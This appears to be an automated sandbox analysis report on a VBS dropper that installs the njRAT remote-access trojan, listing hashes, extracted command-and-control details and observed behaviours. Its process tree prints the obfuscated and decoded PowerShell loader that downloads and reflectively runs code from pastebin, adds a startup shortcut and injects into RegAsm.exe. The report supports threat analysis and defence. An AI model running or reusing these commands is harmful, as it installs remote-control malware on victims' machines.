Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2024 01:25
Static task
static1
Behavioral task
behavioral1
Sample
48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs
Resource
win7-20240708-en
General
-
Target
48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs
-
Size
15.4MB
-
MD5
3ac2f2a9e0ea75fabc9cd17a6cfad0c5
-
SHA1
918caec409f9a49bc055bbfb02d458c131724c83
-
SHA256
48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559
-
SHA512
be4ce3a8489eb2ac441a9ea7c61f93f1b64a4e8435f8bcfbad0c0d83fcc1b7d6e6b5c3b0309616b7ed2bcbd173ce5427e257e14dc84e491766ffbc51af3a1327
-
SSDEEP
192:9HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHM:qXmHsr0+uF8
Malware Config
Extracted
http://pastebin.com/raw/V9y5Q5vv
Extracted
njrat
0.7NC
NYAN CAT
michael2009nj.duckdns.org:2828
bf4e531b630e4de6ab2
-
reg_key
bf4e531b630e4de6ab2
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 7 3108 powershell.exe 8 3108 powershell.exe 10 3108 powershell.exe 16 3108 powershell.exe 25 3108 powershell.exe 29 3108 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___Invictus_________________________________________-------.lnk powershell.exe -
pid Process 1536 powershell.exe 3108 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 8 pastebin.com 9 bitbucket.org 10 bitbucket.org 6 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3108 set thread context of 3112 3108 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1536 powershell.exe 1536 powershell.exe 3108 powershell.exe 3108 powershell.exe 2352 powershell.exe 2352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 1536 powershell.exe Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe Token: 33 3112 RegAsm.exe Token: SeIncBasePriorityPrivilege 3112 RegAsm.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4112 wrote to memory of 1536 4112 WScript.exe 83 PID 4112 wrote to memory of 1536 4112 WScript.exe 83 PID 1536 wrote to memory of 3108 1536 powershell.exe 85 PID 1536 wrote to memory of 3108 1536 powershell.exe 85 PID 3108 wrote to memory of 2352 3108 powershell.exe 86 PID 3108 wrote to memory of 2352 3108 powershell.exe 86 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87 PID 3108 wrote to memory of 3112 3108 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B4☆Hc☆cQB6☆Hg☆I☆☆9☆C☆☆Jw☆w☆DM☆Jw☆7☆CQ☆YgB4☆HY☆YwBy☆C☆☆PQ☆g☆Cc☆JQBw☆Ho☆QQBj☆E8☆ZwBJ☆G4☆TQBy☆CU☆Jw☆7☆Fs☆UwB5☆HM☆d☆Bl☆G0☆LgBO☆GU☆d☆☆u☆FM☆ZQBy☆HY☆aQBj☆GU☆U☆Bv☆Gk☆bgB0☆E0☆YQBu☆GE☆ZwBl☆HI☆XQ☆6☆Do☆UwBl☆HI☆dgBl☆HI☆QwBl☆HI☆d☆Bp☆GY☆aQBj☆GE☆d☆Bl☆FY☆YQBs☆Gk☆Z☆Bh☆HQ☆aQBv☆G4☆QwBh☆Gw☆b☆Bi☆GE☆YwBr☆C☆☆PQ☆g☆Hs☆J☆B0☆HI☆dQBl☆H0☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆agBr☆G8☆cwBz☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆K☆BO☆GU☆dw☆t☆E8☆YgBq☆GU☆YwB0☆C☆☆TgBl☆HQ☆LgBX☆GU☆YgBD☆Gw☆aQBl☆G4☆d☆☆p☆C4☆R☆Bv☆Hc☆bgBs☆G8☆YQBk☆FM☆d☆By☆Gk☆bgBn☆Cg☆JwBo☆HQ☆d☆Bw☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBW☆Dk☆eQ☆1☆FE☆NQB2☆HY☆Jw☆p☆C☆☆KQ☆g☆Ck☆OwBb☆HM☆eQBz☆HQ☆ZQBt☆C4☆QQBw☆H☆☆R☆Bv☆G0☆YQBp☆G4☆XQ☆6☆Do☆QwB1☆HI☆cgBl☆G4☆d☆BE☆G8☆bQBh☆Gk☆bg☆u☆Ew☆bwBh☆GQ☆K☆☆k☆Go☆awBv☆HM☆cw☆p☆C4☆RwBl☆HQ☆V☆B5☆H☆☆ZQ☆o☆Cc☆V☆Bl☆Gg☆dQBs☆GM☆a☆Bl☆HM☆W☆B4☆Fg☆e☆B4☆C4☆QwBs☆GE☆cwBz☆DE☆Jw☆p☆C4☆RwBl☆HQ☆TQBl☆HQ☆a☆Bv☆GQ☆K☆☆n☆E0☆cwBx☆EI☆SQBi☆Fk☆Jw☆p☆C4☆SQBu☆HY☆bwBr☆GU☆K☆☆k☆G4☆dQBs☆Gw☆L☆☆g☆Fs☆bwBi☆Go☆ZQBj☆HQ☆WwBd☆F0☆I☆☆o☆Cc☆W☆B1☆E0☆TgB1☆FQ☆a☆Bp☆C8☆dwBh☆HI☆LwBt☆G8☆Yw☆u☆G4☆aQBi☆GU☆d☆Bz☆GE☆c☆☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆GI☆e☆B2☆GM☆cg☆g☆Cw☆I☆☆n☆F8☆XwBf☆Ek☆bgB2☆Gk☆YwB0☆HU☆cwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆LQ☆t☆C0☆LQ☆t☆C0☆LQ☆n☆Cw☆I☆☆k☆Hg☆dwBx☆Ho☆e☆☆s☆C☆☆Jw☆x☆Cc☆L☆☆g☆Cc☆UgBv☆GQ☆YQ☆n☆C☆☆KQ☆p☆Ds☆';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs');powershell $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$xwqzx = '03';$bxvcr = 'C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $jkoss = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($jkoss).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('XuMNuThi/war/moc.nibetsap//:sptth' , $bxvcr , '___Invictus_________________________________________-------', $xwqzx, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\48bb80b78ab20e88487589c0d691bd65a8d40f785d2d18d54c06bbedd09ca559.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD5eedeb218af57d184b7a06908d84e1f4f
SHA1da8c874abd286ac085f7105d3d9da30336b09509
SHA256f514ecbc9a8915c19aab328ecb319f730ddaf6d6d35cbf7b67bcdd00a4a75d80
SHA5123be9e8b318be85f46692414419847147d9be948e0178962e95ce32899c52a6f26ec94e464a69770bc7a212681f24657222eae14646e484b2d0423076784ec29c
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82